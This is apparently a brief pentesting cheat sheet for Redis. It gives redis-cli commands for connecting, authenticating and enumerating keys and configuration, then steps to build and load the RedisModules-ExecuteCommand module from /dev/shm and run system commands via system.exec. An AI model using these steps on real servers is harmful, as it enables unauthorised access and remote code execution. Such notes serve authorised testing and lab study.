## ------------------| Connect sudo apt-get install redis-tools redis-cli <IP> ## ------------------| Authentication AUTH <username> <password> ## ------------------| Enumerations INFO CONFIG GET * INFO keyspace SELECT 1 KEYS * GET <KEY>
RedisModules-ExecuteCommand
## ------------------| Setup git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git cd RedisModules-ExecuteCommand && make cp module.so /dev/shm/ ## ------------------| Load module in to radis MODULE LOAD /dev/shm/module.so MODULE LIST system.exec "id"
Last updated 1 year ago